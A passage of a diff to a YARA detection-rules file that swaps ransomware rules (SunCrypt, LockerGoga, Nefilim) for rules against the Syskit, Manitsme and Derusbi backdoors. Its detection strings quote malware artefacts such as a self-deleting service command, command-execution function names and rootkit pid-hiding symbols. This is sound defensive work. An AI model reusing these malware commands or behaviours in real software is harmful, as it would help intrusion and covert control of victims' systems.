475263????78??58445A63????78??37475263????78??5847554D5A4678??4C475263????78??584A5938????79??58475263??????6B??????38????7A??44475261526178??576C64??????70??584752616475??6B??????63????71??4847526170??78??5772??73??4672??6E47526131??????5775??38????72??2F475262????78??5778??38????73??58475262????78??5730??????4674??6E475262????78??5733????5A4675??434E5265??5136??4D46414142512F31????69????????????51554F677A??514141555039????496C466E4931????46446F4977??414146442F565169????????????6152516A??5877??5039????46442F565169????????????52434C514269????????????4932????502F2F2F31??????667A??565A434677??515A67??32????414142414855433677??4C526677??68????????2F2B????667A??31????46454974??434974??454974??4E4474??47484A4D69??????????414969??????????5838????36??6661414164??69??????????????6A??565978??2F31????68????????32????61414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C4249476F4561414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C42494974??45494E34??414231????74??454974??43476F49575776??42594E38????77??64??474C5252434C514169??????????????534A51534472??476F4561414177??41434C5252434C514169??????????????6F412F31????67??????69??????????456769??????????67????48554636??67??4141434C5252434C51416A??63????4C5252442F63????4C5252442F63????6F30????4141495045444974??454974??434974??454974??43412B??5352534E524167??69????????????38????73??69??????????6C462F4974??454974??43412B??51415935????????4F5774??2F4369??????????????45516130????4B4974??454974??454974??6D414E4D4168????????5838????74??454974??494974??6D414E4D416778??36??59424141434478??7A??73??64??6C4145414141417A??412B????50372F2F34??466C4D6E44565976??555974??434974??434974??45496C49424974??434974??42412B??414431????67??4164??517A??4F73??69??????????414569??????????6B??????67??????554969????????????4969??????????68????????4164??517A?? }
+		$pdb = "\\MF-v1.2\\Server\\Debug\\Server.pdb"
+		$pdb1 = "\\fox_1.2 20110307\\MF-v1.2\\Server\\Release\\MirageFox_Server.pdb"
 
 	condition:
-		uint16( 0 ) == 0x6441 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-rule TRELLIX_ARC_RANSOM_Suncrypt_Decryptor : RANSOMWARE FILE
+
+rule TRELLIX_ARC_Syskit : FILE
 {
 	meta:
-		description = "Rule to detect SunCrypt ransomware decryptor"
-		author = "McAfee ATR Team"
-		id = "ec0d3811-6083-5537-bf29-32ee02d43b5e"
-		date = "2020-10-02"
-		modified = "2020-11-02"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Suncrypt.yar#L27-L50"
+		description = "SYSkit backdoor"
+		author = "Christiaan @ McAfee ATR"
+		id = "f06db38f-52d5-51b5-a17f-63e285dd5f80"
+		date = "2019-09-17"
+		modified = "2020-04-02"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Tortoiseshell_Syskit.yar#L3-L40"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "59d1193bb0f8d3983a181394b5dd5247470d9e118cc4fe0674167f162bcdb6e1"
+		logic_hash = "5b489d47d56de5c770b6ff6d6d56bf0fb87174f4a8428052b28fb392d9ac3f87"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/Suncrypt"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-		hash1 = "a0f99367b0a0a358ed6e5ae25904016d02aef6aa7c0423c34aa3ec3fd6354310"
+		quality = 68
+		tags = "FILE"
+		hash1 = "07d123364d8d04e3fe0bfa4e0e23ddc7050ef039602ecd72baed70e6553c3ae4"
+		hash2 = "f71732f997c53fa45eef5c988697eb4aa62c8655d8f0be3268636fc23addd193"
+		hash3 = "02a3296238a3d127a2e517f4949d31914c15d96726fb4902322c065153b364b2"
 
 	strings:
-		$pattern = { 558BEC81EC88000000837D08008BC10F101A89957CFFFFFF0F104A10898578FFFFFF0F1062200F106A300F115D940F114DA40F1165B40F116DC40F8E340200008B45D08B4DC48B55B08945F88B45CC8945E08B45C88945E88B45C08945F08B45BC8945F48B45B8538B5DA88945EC8B45AC568B75A48945D48B45A0578975DC8945E48B459403C68BF033F18B4DB4C1C61003CE8BF9337DDCC1C70C03C78945DC33C6C1C0088945D803C18B4DEC89458833C7C1C0078945848B459803C38BF03375E8C1C61003CE8BF933FBC1C70C03C78945E833C6C1C00889458C03C18B4DF48BD88945EC33DF8B459C0345D48B7DE48BF03375E003FAC1C61003CEC1C307894DF4334DD4C1C10C03C133F08945908B45F0C1C6088975800375F433CEC1C107894DE08B4DF833CFC1C11003C133D08945F0C1C20C8D043A8B7DF033C88945E48B45DCC1C10803F9894DF833D7C1C20703C38BC8334DF8C1C11003F18975FC315DFC8B5DFCC1C30C03C389459433C1C1C0088945F88945D003C633D88945F48945BC8B45E80345E08BC8C1C307334DD8C1C110895DFC895DA88B5DEC8D340F8BFE337DE0C1C70C03C789459833C1C1C0088945D88945C403C68B758833F88945F08945C08B459003C2C1C7078BC8897DD4334D8CC1C11003F1897DAC8B7DE433D6037D84C1C20C03C289459C33C1C1C0088945E88945C803C633D08945B48BC7C1C207334580C1C01003D88BCB334D84C1C10C03F98BF7897DE433F0897DA0C1C60803DE8975E08975CC895DEC8B45088BF333F1895DB88B5DFC488B4DD8C1C6078975DC8975A489450885C00F8F30FEFFFF0F106DC48B8578FFFFFF0F1065B45F0F105D948955B00F104DA48B957CFFFFFF5E5B0F10020F105210660FFED80F104230660FFED10F104A200F1118660FFECC660FFEC50F1150100F1148200F1140308BE55DC3CCCCCCCCCCCCCCCCCCCC558BEC83E4F081EC58020000568BC18B4D1489442420578BFA897C24283D000100000F82680A0000660F6E07660F70C800660F6E4704660F70D000660F6E4708660F70D800660F6E470C660F70E000660F6E4710660F70E800660F6E47148B7508660F70F000660F6E47188B550C660F70F8008D8EC0000000660F6E471C660F70C0000F29842430010000660F6E4720660F70C0000F29842440010000660F6E4724660F70C0000F29842450010000660F6E4728660F70C0000F29842460010000660F6E472C894C240C8D8AC0000000660F70C000894C241C8D8E800000000F29842470010000660F6E4738894C24148D8A80000000660F70C000894C24188D4E400F29842480010000660F6E473C894C242C8D4A40660F70C000C1E8080F298C24A00100000F299424B00100000F299C24C00100000F29A424D00100000F29AC24E00100000F29B424F00100000F29BC24000200000F29842490010000894C24108944242066660F1F8400000000000F2884243001000033C00B47308B4F340F298424800000000F288424400100000F298424900000000F288424500100000F294424600F288424600100000F298424100100000F28842470010000894C244C8944244883C0040F298C24D0000000F30F7E4C244883D1000F298424200100000F288424900100000F299424E00000000F2815A02B4200660F6CC90F29442430660FD4D10F2805B02B42000F29A424A0000000660FD4C10F28E20F29B42400010000660F62E0660F6AD00F28F40F299C24F00000000F28DD0F28AC2480010000660F62F20F297C24700F28FE660F6AE2894F348B4D140F295C24500F29AC24C00000000F29A424B00000000F29BC24400200000F29A4245002000089473085C90F84820400000F287C24708BC166900F28D3660FFE9424D0000000660FEFF2660F380035C02B42000F28DE660FFE9C24900000000F28C3660FEF4424500F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942400010000660FFE9424E0000000660FEFF0660F380035D02B42000F29842490000000660FEFE2660F380025C02B42000F28C60F29742470660FFEC30F28DC660FFE5C24600F29842410020000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424000100000F298C24200200000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D7660FFE9424F0000000660FEFE0660F380025D02B42000F29442460660FEFEA660F38002DC02B42000F28C40F29A424B0000000660FFEC30F28DD660FFE9C24100100000F29842430020000660FEFC10F28F0660F72F007660F72D619660FEBF00F28C3660FEFC70F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FFE9424A0000000660FEFE8660F38002DD02B42000F294424500F28E50F29AC24C0000000660FFEE30F28C4660FEFC10F28F8660F72F007660F72D719660FEBF80F286C2430660FEFEA660F38002DC02B42000F28DD660FFE9C24200100000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D6660FEFE8660FFE942490000000660F38002DD02B42000F298424A00000000F296C2430660FFEEB0F28C5660FEFC10F28C8660F72F007660F72D119660FEBC80F28442430660FEFC20F298C2480000000660F380005C02B42000F28D80F29442430660FFEDC0F28C3660FEFC60F287424700F28C8660F72F00C660F72D114660FEBC80F284424300F28E1660FFEE20F28D7660FFE542460660FEFC4660F380005D02B4200660FEFF20F29A424D0000000660F380035C02B42000F29442430660FFEC30F298424100100000F28DE660FEFC1660FFEDD0F28C8660F72F007660F72D119660FEBC80F28C3660FEFC70F298C24000100000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FEFF00F298424E0000000660F380035D02B42000F28C6660FFEC30F29842420010000660FEFC10F28F8660F72F007660F72D719660FEBF8660FFE5424500F28A424B00000000F28AC24C0000000660FEFE2660F380025C02B42000F28DC660FFE9C24100200000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942420020000660FFE9424A0000000660FEFE00F298424F0000000660FEFEA660F380025D02B4200660F38002DC02B42000F29A424B00000000F28C4660FFEC30F28DD660FFE9C24300200000F29842490000000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424200200000F298C24800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F298424A0000000660FEFE8660F38002DD02B42000F29AC24C00000000F28C5660FFEC30F29442460660FEFC10F28D8660F72F007660F72D319660FEBD80F295C245083E8010F8594FBFFFF0F297C24700F28BC24400200000F28AC24A0010000660FFEAC24D00000000F28A424C00100000F28DD660FFEA424F00000000F288C24B00100000F28D4660FFE8C24E00000000F288424D0010000660FFE8424A00000008B44242C8B7C2414660F62D9660F6AE90F28CB660F6AE0660F62D00F10068344241410660F6CCA660FEFC8660F6DDA0F110A0F10008B4424100F28CD660F6DEC660FEFD8660F6CCC0F28A424000200000F111883C0100F10078B7C2418660FFE642470660FEFC883442418100F28D4894424100F110F8B7C240C0F288C24F0010000660FFE8C24000100008344240C100F10078B7C241C8344241C10660FEFE80F28842430010000660FFE8424800000000F112F8B7C242C0F28AC24E0010000660FFE6C24500F28DD660F62D0660F62D9660F6AE90F28CB660F6AE00F104610660F6CCA660FEFC8660F6DDA0F114A100F1047100F28CD660F6DEC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFE80F11280F28AC2440010000660FFEFE660FFEAC24900000000F28A424600100000F28DD660FFEA424100100000F288C24500100000F28D4660FFE4C24600F28842470010000660FFE84242001000083442410108B4424108344241410660F62D98344241810660F6AE90F28CB660F6AE0660F62D00F1046208344240C10660F6CCA660FEFC88344241C100F114A200F104720660F6DDA0F28CD660FEFD8660F6CCC0F11188B44241483442414100F28DF660F6DEC0F28A424800100000F10008B442418660FFEA424C0000000660FEFC883442418100F28D40F11088B44240C0F288C2450020000660FFE8C24B00000008344240C100F10008B44241C660F62D9660FEFE8660F6AF90F288424900100000F28CB660FFE4424300F11288B442410660F62D083C010660F6AE00F1046308344241C10660F6CCA660FEFC8660F6DDA0F114A30894424100F1047300F28CF660F6DFC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFF881442410D000000081C70001000081442418D000000081C2000100008144241CD000000081C60001000081442414D00000008144240CD00000000F288C24A00100000F289424B00100000F289C24C00100000F28A424D00100000F28AC24E00100000F28B424F00100000F11388B4424240F28BC24000200002D00010000836C242001897C242C8B7C2428894424240F85E2F6FFFFEB068B550C8B75088954241083F8400F829A010000C1E80689442420660F1F4400000F10370F1057100F107F200F106F3085C90F84F60000008BC10F1F80000000000F28DA660FFEDE660FEFEB660F38002DC02B42000F28E5660FFEE70F28C4660FEFC20F28C8660F72F00C660F72D114660FEFC80F28D1660FFED3660FEFEA660F70D293660F38002DD02B42000F28DD660F70ED4E660FFEDC660F70E3390F28C3660FEFC10F28C8660F72F007660F72D119660FEFC8660FFED1660FEFEA660F38002DC02B4200660FFEE50F28C4660FEFC10F28D8660F72F00C660F72D314660FEFD80F28C3660FFEC2660F70F039660FEFE8660F38002DD02B42000F28C5660F70ED4E660FFEC4660F70F8930F28C8660FEFCB0F28D1 }
+		$x1 = "timeout /t 10 & sc stop dllhost & timeout /t 10 & del C:\\Windows\\Temp\\BAK.exe" fullword wide
+		$s2 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii
+		$s3 = "C:\\Windows\\Temp\\rconfig.xml" fullword wide
+		$s4 = "Add-Type -AssemblyName System.IO.Compression.FileSystem" fullword wide
+		$s5 = "serviceProcessInstaller1" fullword ascii
+		$s6 = "    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)" fullword wide
+		$s7 = "exec_cmd2" fullword ascii
+		$s8 = "exec_cmd" fullword ascii
+		$s9 = "send_command_result" fullword ascii
+		$s10 = "mycontent" fullword ascii
+		$s11 = "Diagnostic Server Host" fullword wide
+		$s12 = "bytesToBeEncrypted" fullword ascii
+		$s13 = "createPostRequest" fullword ascii
+		$s14 = "myhash" fullword ascii
+		$s15 = "DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5" ascii
+		$s16 = "circle_time" fullword ascii
+		$s17 = "ServiceStart_AfterInstall" fullword ascii
+		$s18 = "serviceInstaller1" fullword ascii
+		$s19 = "BAK.ProjectInstaller.resources" fullword ascii
+		$s20 = "Dll host" fullword wide
+		$op0 = { 96 00 f1 0a 57 02 05 00 34 25 }
+		$op1 = { 96 00 83 05 5a 01 0e 00 38 28 }
+		$op2 = { 06 00 00 11 28 4d 00 00 0a 02 6f 4e 00 00 0a 28 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Lockergogaransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Manitsme_Trojan : TROJAN FILE
 {
 	meta:
-		description = "LockerGoga Ransomware"
-		author = "Christiaan Beek - McAfee ATR team"
-		id = "bdf5da34-adf0-5731-820f-96511e647a83"
-		date = "2019-03-20"
+		description = "Rule to detect the Manitsme trojan"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "49e0c934-6920-5e49-837c-27ebbbd5a1a2"
+		date = "2013-03-08"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_LockerGoga.yar#L1-L36"
+		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_manitsme_trojan_pdb.yar#L1-L36"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f"
-		logic_hash = "165fa0fa044b2e0d2344626c2064162f23e13dc17310a772b703dbbe9457bd99"
+		hash = "c1c0ea096ec4d36c1312171de2a9ebe258c588528a20dbb06a7e3cf97bf1e197"
+		logic_hash = "584053145249a930d3eae5e291d3553c57fa427dbecac9f04e7c0169f153b7af"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/LockerGoga"
-		actor_type = "Cybercrime"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Manitsme"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$1 = "boost::interprocess::spin_recursive_mutex recursive lock overflow" fullword ascii
-		$2 = ".?AU?$error_info_injector@Usync_queue_is_closed@concurrent@boost@@@exception_detail@boost@@" fullword ascii
-		$3 = ".?AV?$CipherModeFinalTemplate_CipherHolder@V?$BlockCipherFinal@$00VDec@RC6@CryptoPP@@@CryptoPP@@VCBC_Decryption@2@@CryptoPP@@" fullword ascii
-		$4 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
-		$5 = "cipher.exe" fullword ascii
-		$6 = ".?AU?$placement_destroy@Utrace_queue@@@ipcdetail@interprocess@boost@@" fullword ascii
-		$7 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
-		$8 = "CreateProcess failed" fullword ascii
-		$9 = "boost::dll::shared_library::load() failed" fullword ascii
-		$op1 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff }
-		$op2 = { 8b df 83 cb 0f 81 fb ff ff ff 7f 76 07 bb ff ff }
+		$s1 = "SvcMain.dll" fullword ascii
+		$s2 = "rj.soft.misecure.com" fullword ascii
+		$s3 = "d:\\rouji\\SvcMain.pdb" fullword ascii
+		$s4 = "constructor or from DllMain." fullword ascii
+		$s5 = "Open File Error" fullword ascii
+		$s6 = "nRet == SOCKET_ERROR" fullword ascii
+		$s7 = "Oh,shit" fullword ascii
+		$s8 = "Paraing" fullword ascii
+		$s9 = "Hallelujah" fullword ascii
+		$s10 = "ComSpec" fullword ascii
+		$s11 = "ServiceMain" fullword ascii
+		$s12 = "SendTo(s,(char *)&sztop,sizeof(sztop),FILETYPE) == ERRTYPE" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 6 of them ) and all of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule TRELLIX_ARC_Nefilim_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Nefilim ransomware"
+		description = "Rule to detect the APT Derusbi ELF file"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "55d9cb20-5071-5dce-a46f-a20816ba379f"
-		date = "2020-03-17"
-		modified = "2020-04-03"
-		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L3-L48"
+		id = "3b1c9644-7279-5e2c-8891-f03ca78cf3b7"
+		date = "2017-05-31"
+		modified = "2020-08-14"
+		reference = "https://attack.mitre.org/software/S0021/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Derusbi.yar#L1-L61"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6"
-		logic_hash = "d8cd5d2dd552d3e9f57f7bd244e941fe89a96ab16bbcc71911e8e2a519f53f03"
+		logic_hash = "0a83566a0540d28d1cc0ebee01d29d15ddc86cabff9044fd8a198b847ba24c50"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
+		quality = 68
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nefilim"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:ELF/Derusbi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Users\\Administrator\\Desktop\\New folder\\Release\\NEFILIM.pdb" fullword ascii
-		$s2 = "oh how i did it??? bypass sofos hah" fullword ascii
-		$s3 = " /c timeout /t 3 /nobreak && del \"" fullword wide
-		$s4 = "NEFILIM-DECRYPT.txt" fullword wide
-		$op0 = { db ff ff ff 55 8b ec 83 ec 24 53 56 57 89 55 f4 }
-		$op1 = { 60 be 00 d0 40 00 8d be 00 40 ff ff 57 eb 0b 90 }
-		$op2 = { 84 e0 40 00 90 d1 40 00 08 }
-		$bp = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????53568D??????????E8????????33??6A??5939????76??5783????75??8B????8D????A5A5A58D??????????A5508D????E8????????596A??588B????8D????80????75??48C6????79??EB??FE????33??8A??????8B????30????43413B????72??5F8B????8B????6A??2B??5E8A????88??404E75??5E5BC9C3558B??81??????????53FF????8D??????????50FF??????????68????????8D??????????50FF??????????33??53536A??535368????????8D??????????50FF??????????89????3B??0F84????????56578D????5053BE????????5689????FF??????????5056E8????????83????85??75??53FF??????????FF????8B??????????53FF??50FF??????????8D????51505689????FF??????????5056E8????????83????85??74??8B????89????8D????50FF????E8????????59595385??74??8D????50FF????FF????FF????FF??????????FF????53FF??50FF??????????5F5E5BC9C3558B??83????81??????????535657FF????8D????????????50FF??????????8B??????????68????????8D????????????50FF??8D??????508D????????????50FF??????????89??????83????0F84????????8B??????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????F6????????FF????8D????????????5074??FF??????????8D??????508D????????????50FF??68????????8D????????????50FF??8D????????????50E8????????E9????????FF??????????8D??????508D????????????50FF??8D??????50E8????????8B??C7????????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????8D??????50FF??85??74??8D????????????50E8????????598D??????50FF??????FF??????????85??0F85????????FF??????FF??????????5F5E5B8B??5DC3558B??81??????????53565768????????FF??????????8B??????????5033??57FF??8B??????????50FF??68????????89????FF??????????89????B8????????39????74??8B????2B??8A??FF????88????4039????75??57576A??575768????????FF????FF??????????89????3B??0F84????????8D????5150FF??????????6A??57FF??50FF??6A??5789????FF??50FF??FF????89????E8????????FF????E8????????595968????????57FF??50FF??68????????5789????FF??50FF??FF????8B????89????E8????????FF????8B????E8????????8B??????????59595757FF????FF????FF????FF??57FF??????????578D????5068????????FF????FF????FF??????????FF??????????83????0F84????????FF??????????83????0F84????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF????FF????FF??????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF??????????50FF????FF????FF??????????8B????8B????3B??0F8C????????7F??81??????????0F86????????89????89????3B??0F8C????????7F??3B??0F86????????EB??8B????2B????1B????89????0F88????????7F??81??????????0F82????????68????????57FF??50FF??????????5757FF????89????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????5757FF????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF??FF????5750FF??????????81????????????8B????11????39????0F8C????????0F8F????????8B????39????0F82????????E9????????3B??7C??7F??81??????????76??68????????57FF??50FF??????????575733??89????5133??50FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????575733??5050FF????FF??578D????5068????????EB??5157FF??50FF??????????575733??89????5133??50FF????FF??578D????50FF????FF????FF????FF??????????FF????8B????FF????FF????FF????E8????????83????575733??5050FF????FF??578D????50FF????FF????FF????FF??????????FF????57FF??50FF??????????FF????FF??????????FF????57FF??8B??????????50FF??FF???? }
+		$s1 = "LxMain"
+		$s2 = "execve"
+		$s3 = "kill"
+		$s4 = "cp -a %s %s"
+		$s5 = "%s &"
+		$s6 = "dbus-daemon"
+		$s7 = "--noprofile"
+		$s8 = "--norc"
+		$s9 = "TERM=vt100"
+		$s10 = "/proc/%u/cmdline"
+		$s11 = "loadso"
+		$s12 = "/proc/self/exe"
+		$s13 = "Proxy-Connection: Keep-Alive"
+		$s14 = "Connection: Keep-Alive"
+		$s15 = "CONNECT %s"
+		$s16 = "HOST: %s:%d"
+		$s17 = "User-Agent: Mozilla/4.0"
+		$s18 = "Proxy-Authorization: Basic %s"
+		$s19 = "Server: Apache"
+		$s20 = "Proxy-Authenticate"
+		$s21 = "gettimeofday"
+		$s22 = "pthread_create"
+		$s23 = "pthread_join"
+		$s24 = "pthread_mutex_init"
+		$s25 = "pthread_mutex_destroy"
+		$s26 = "pthread_mutex_lock"
+		$s27 = "getsockopt"
+		$s28 = "socket"
+		$s29 = "setsockopt"
+		$s30 = "select"
+		$s31 = "bind"
+		$s32 = "shutdown"
+		$s33 = "listen"
+		$s34 = "opendir"
+		$s35 = "readdir"
+		$s36 = "closedir"
+		$s37 = "rename"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or all of ( $op* ) or $bp
+		( uint32( 0 ) == 0x4464c457f ) and filesize < 200KB and all of them
 }
-
-rule TRELLIX_ARC_Nefilim_Signed : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Kernelmodule : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Nefilim samples digitally signed"
+		description = "Rule to detect the Derusbi ELK Kernel module"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "a9a5daf0-4cfb-556a-b20a-72283fb1a0f9"
-		date = "2020-04-02"
+		id = "1614a63d-c5d1-5ce1-a5b8-eb48325f60e6"
+		date = "2017-05-31"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L50-L72"
+		reference = "https://attack.mitre.org/software/S0021/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Derusbi.yar#L63-L105"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5"
-		logic_hash = "7625eb7de1ebb2f5410552b8983379f213d639f5e146a5d951975b69eb8111d3"
+		logic_hash = "0b86e96ef616e926f0d665e2bd013f2773461483176c68bd5e7c7d059ac13d78"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nefilim"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:ELF/Derusbi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
+	strings:
+		$s1 = "__this_module"
+		$s2 = "init_module"
+		$s3 = "unhide_pid"
+		$s4 = "is_hidden_pid"
+		$s5 = "clear_hidden_pid"
+		$s6 = "hide_pid"
+		$s7 = "license"
+		$s8 = "description"
+		$s9 = "srcversion="
+		$s10 = "depends="
+		$s11 = "vermagic="
+		$s12 = "current_task"
+		$s13 = "sock_release"
+		$s14 = "module_layout"
+		$s15 = "init_uts_ns"
+		$s16 = "init_net"
+		$s17 = "init_task"
+		$s18 = "filp_open"
+		$s19 = "__netlink_kernel_create"
+		$s20 = "kfree_skb"
+
 	condition:
